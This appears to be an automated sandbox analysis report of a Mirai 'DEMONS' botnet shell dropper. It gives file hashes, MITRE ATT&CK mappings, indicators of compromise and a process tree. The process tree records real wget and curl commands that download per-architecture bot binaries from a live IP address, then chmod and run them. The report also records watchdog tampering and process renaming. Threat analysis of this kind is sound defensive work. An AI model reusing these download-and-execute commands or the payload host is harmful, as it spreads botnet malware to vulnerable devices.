mirai | e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f

Analysis

max time kernel
143s
max time network
147s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
07/03/2025, 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0x83911d24Fx.sh
Size

2KB
MD5

6aea9de4b1853e6a5cea8ad020f48398
SHA1

20e44372765f05e6899aa9bd7e4d9ff64f59c2f7
SHA256

e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f
SHA512

4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2

Score

10^/10

mirai demons botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1577	chmod
1584	chmod
1591	chmod
1505	chmod
1526	chmod
1533	chmod
1540	chmod
1549	chmod
1556	chmod
1563	chmod
1570	chmod
1512	chmod
1519	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/x	1506	0x83911d24Fx.sh
/tmp/x	1513	0x83911d24Fx.sh
/tmp/x	1520	0x83911d24Fx.sh
/tmp/x	1527	0x83911d24Fx.sh
/tmp/x	1534	0x83911d24Fx.sh
/tmp/x	1541	0x83911d24Fx.sh
/tmp/x	1550	0x83911d24Fx.sh
/tmp/x	1557	0x83911d24Fx.sh
/tmp/x	1564	0x83911d24Fx.sh
/tmp/x	1571	0x83911d24Fx.sh
/tmp/x	1578	0x83911d24Fx.sh
/tmp/x	1585	0x83911d24Fx.sh
/tmp/x	1592	0x83911d24Fx.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	0x83911d24Fx.sh
File opened for modification	/dev/misc/watchdog	0x83911d24Fx.sh

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	0x83911d24Fx.sh

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	0x83911d24Fx.sh

Changes its process name 13 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1506	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1513	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1520	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1527	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1534	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1541	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1550	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1557	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1564	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1571	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1578	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1585	0x83911d24Fx.sh
Changes the process name, possibly in an attempt to hide itself	1592	0x83911d24Fx.sh

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	0x83911d24Fx.sh

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1508	wget
1510	curl

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/uYtea.x86_64	curl
File opened for modification	/tmp/uYtea.mpsl	wget
File opened for modification	/tmp/uYtea.arm6	wget
File opened for modification	/tmp/uYtea.arm7	curl
File opened for modification	/tmp/uYtea.ppc	wget
File opened for modification	/tmp/uYtea.sh4	wget
File opened for modification	/tmp/uYtea.sh4	curl
File opened for modification	/tmp/uYtea.spc	wget
File opened for modification	/tmp/uYtea.spc	curl
File opened for modification	/tmp/uYtea.x86	wget
File opened for modification	/tmp/uYtea.mips	wget
File opened for modification	/tmp/uYtea.arm	curl
File opened for modification	/tmp/uYtea.arm7	wget
File opened for modification	/tmp/uYtea.x86_64	wget
File opened for modification	/tmp/uYtea.x86	curl
File opened for modification	/tmp/uYtea.mips	curl
File opened for modification	/tmp/uYtea.arm	wget
File opened for modification	/tmp/uYtea.arm5	curl
File opened for modification	/tmp/uYtea.arm6	curl
File opened for modification	/tmp/uYtea.m68k	wget
File opened for modification	/tmp/uYtea.arc	curl
File opened for modification	/tmp/x	0x83911d24Fx.sh
File opened for modification	/tmp/uYtea.mpsl	curl
File opened for modification	/tmp/uYtea.arm5	wget
File opened for modification	/tmp/uYtea.ppc	curl
File opened for modification	/tmp/uYtea.m68k	curl
File opened for modification	/tmp/uYtea.arc	wget

/tmp/0x83911d24Fx.sh
/tmp/0x83911d24Fx.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Writes file to tmp directory
PID:1497
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.x86
  2⤵
  - Writes file to tmp directory
  PID:1499
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.x86
  2⤵
  - Writes file to tmp directory
  PID:1503
- /bin/cat
  cat uYtea.x86
  2⤵
  PID:1504
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.mips uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1515
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.mips uYtea.mpsl uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.arm
  2⤵
  - Writes file to tmp directory
  PID:1522
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.arm
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.arm5
  2⤵
  - Writes file to tmp directory
  PID:1529
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.arm5
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.arm6
  2⤵
  - Writes file to tmp directory
  PID:1536
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.arm6
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-itosN3 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.arm7
  2⤵
  - Writes file to tmp directory
  PID:1543
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.arm7
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.ppc
  2⤵
  - Writes file to tmp directory
  PID:1552
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.ppc
  2⤵
  - Writes file to tmp directory
  PID:1554
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.m68k
  2⤵
  - Writes file to tmp directory
  PID:1559
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.m68k
  2⤵
  - Writes file to tmp directory
  PID:1561
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1563
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.sh4
  2⤵
  - Writes file to tmp directory
  PID:1566
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.sh4
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1570
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.spc
  2⤵
  - Writes file to tmp directory
  PID:1573
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.spc
  2⤵
  - Writes file to tmp directory
  PID:1575
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1577
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.arc
  2⤵
  - Writes file to tmp directory
  PID:1580
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.arc
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /usr/bin/wget
  wget http://176.100.37.236/LjEZs/uYtea.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1587
- /usr/bin/curl
  curl -O http://176.100.37.236/LjEZs/uYtea.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/chmod
  chmod +x 0x83911d24Fx.sh config-err-4Wxxtz netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x
  2⤵
  - File and Directory Permissions Modification
  PID:1591

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/uYtea.x86

Filesize
54KB

MD5
e8ee0839bb7869765d80e4280d585222

SHA1
e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538

SHA256
34537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6

SHA512
a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads